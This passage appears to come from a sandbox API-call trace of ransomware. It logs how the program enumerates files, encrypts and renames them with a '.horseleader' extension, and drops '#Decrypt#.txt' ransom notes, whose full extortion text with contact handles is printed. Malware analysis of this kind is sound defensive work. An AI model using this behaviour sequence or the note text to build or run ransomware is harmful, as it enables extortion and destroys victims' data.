lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.746] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the 
Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.746] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.747] lstrlenA (lpString="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") returned 1368 [0244.747] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.747] CloseHandle (hObject=0x1a4) returned 1 [0244.747] GetProcessHeap () returned 0x780000 [0244.747] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.748] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="PRJPROR", cAlternateFileName="")) returned 1 [0244.748] lstrcmpiW (lpString1="PRJPROR", lpString2="Windows") returned -1 [0244.748] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR") returned 91 [0244.748] lstrcmpW (lpString1="PRJPROR", lpString2=".") returned 1 [0244.748] lstrcmpW (lpString1="PRJPROR", lpString2="..") returned 1 [0244.748] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.748] GetProcessHeap () returned 
0x780000 [0244.748] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.748] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*") returned 93 [0244.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.749] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\.") returned 93 [0244.749] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.749] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe2e8f80, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbec48620, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.749] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\..") returned 94 [0244.749] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.749] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60fd8f0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbe2e8f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="PrjProrWW.XML", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0244.749] lstrcmpiW (lpString1="PrjProrWW.XML", lpString2="Windows") returned -1 [0244.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 105 [0244.749] StrStrIW (lpFirst="PrjProrWW.XML", lpSrch=".horseleader") returned 0x0 [0244.749] lstrcmpW (lpString1="PrjProrWW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.749] lstrcmpW (lpString1="PrjProrWW.XML", lpString2="_uninstalling_.png") returned 1 [0244.749] lstrlenW (lpString=".testttjffg") returned 11 [0244.750] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML", lpSrch=".testttjffg") returned 0x0 [0244.750] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.750] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 
Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.750] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 105 [0244.750] StrStrW (lpFirst="PrjProrWW.XML", lpSrch=".txt") returned 0x0 [0244.750] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=6421) returned 1 [0244.751] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x1915, lpOverlapped=0x0) returned 1 [0244.753] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe6eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.753] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1915, lpOverlapped=0x0) returned 1 [0244.753] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.753] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.754] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.754] CloseHandle (hObject=0x15c) returned 1 [0244.754] GetProcessHeap 
() returned 0x780000 [0244.754] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.754] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.horseleader") returned 117 [0244.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.horseleader")) returned 1 [0244.755] GetProcessHeap () returned 0x780000 [0244.755] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.755] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c227b0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.755] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.755] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 101 [0244.755] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.755] lstrcmpW 
(lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.755] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.755] lstrlenW (lpString=".testttjffg") returned 11 [0244.755] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.755] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.755] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.756] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 101 [0244.756] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.756] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=16683) returned 1 [0244.756] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x412b, lpOverlapped=0x0) returned 1 [0244.759] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbed5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.759] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x412b, lpNumberOfBytesWritten=0x32ae904, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x412b, lpOverlapped=0x0) returned 1 [0244.760] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.760] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.760] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.760] CloseHandle (hObject=0x15c) returned 1 [0244.760] GetProcessHeap () returned 0x780000 [0244.760] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.760] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.horseleader") returned 113 [0244.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.horseleader")) returned 1 [0244.761] GetProcessHeap () returned 0x780000 [0244.761] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.762] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xa8c227b0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.762] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.762] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\#Decrypt#.txt") returned 105 [0244.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.765] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.765] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.766] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.766] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.767] CloseHandle (hObject=0x1a4) returned 1 [0244.767] 
GetProcessHeap () returned 0x780000 [0244.767] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.767] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Project.en-us", cAlternateFileName="PROJEC~1.EN-")) returned 1 [0244.767] lstrcmpiW (lpString1="Project.en-us", lpString2="Windows") returned -1 [0244.767] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us") returned 97 [0244.767] lstrcmpW (lpString1="Project.en-us", lpString2=".") returned 1 [0244.767] lstrcmpW (lpString1="Project.en-us", lpString2="..") returned 1 [0244.767] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.767] GetProcessHeap () returned 0x780000 [0244.767] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.768] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*") returned 99 [0244.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, 
ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\.") returned 99 [0244.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.769] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\..") returned 100 [0244.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.770] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.770] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5b2ebe0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf551ba0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, 
nFileSizeLow=0x5ac, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="ProjectMUI.XML", cAlternateFileName="PROJEC~1.XML")) returned 1 [0244.770] lstrcmpiW (lpString1="ProjectMUI.XML", lpString2="Windows") returned -1 [0244.770] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 112 [0244.770] StrStrIW (lpFirst="ProjectMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.770] lstrcmpW (lpString1="ProjectMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.770] lstrcmpW (lpString1="ProjectMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.770] lstrlenW (lpString=".testttjffg") returned 11 [0244.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.770] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 